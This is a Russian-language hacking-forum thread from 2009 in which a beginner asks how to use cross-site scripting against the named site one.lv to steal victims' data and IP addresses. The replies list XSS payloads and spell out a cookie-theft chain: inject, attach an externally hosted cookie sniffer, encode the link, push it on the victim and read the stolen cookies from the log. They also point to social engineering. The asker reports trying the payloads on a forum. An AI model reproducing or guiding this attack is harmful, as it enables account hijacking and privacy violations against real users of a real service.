PDA

Просмотр полной версии : XSS помогите

sakrej1
11.12.2009, 11:27
Люди помогите! Прочитал вот это (http://forum.antichat.ru/thread20140.html) и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Меня интересует что бы это работало на www.one.lv Или помогите на практике. Могу дать аккаунт для опытов, если кто решит помоч.
P.S. В гугл просьба непосылать, там кроме этой статьи ничего нет.
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
Gedj
11.12.2009, 12:10
если ты там ничего непонял никто тебе необъяснит там и так все подробно расписано
root_sashok
11.12.2009, 12:19
Логинься и подставляй во все поля всевозможные комбинации:

<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>

Найдешь, прицепишь сниффер (http://hacker-pro.net/sniffer/), зашифруешь ссылку здесь (http://ha.ckers.org/xss.html), впаришь жертве, проверишь лог сниффера - куки твои.
Nizhegorodets
11.12.2009, 17:44
Насчет IP жертвы и инфы, СИ тебе в помощь

http://www.social.do.am/
http://bugtraq.ru/library/misc/social.html
DiHWO
11.12.2009, 19:52
Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.

Если чесно, я когда изучал xss тоже ничего по этой статье непонял, до меня долго доходило, надо сам смысл почувствовать. А вот про то что в гугле только одна страница - убило.

P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?



Насчет IP жертвы и инфы, СИ тебе в помощь


В логах сниффера будет айпи, в поле реферер или аналогичном ему.
sakrej1
12.12.2009, 12:08
Логинься и подставляй во все поля всевозможные комбинации:

<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>

Найдешь, прицепишь сниффер (http://hacker-pro.net/sniffer/), зашифруешь ссылку здесь (http://ha.ckers.org/xss.html), впаришь жертве, проверишь лог сниффера - куки твои.
Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.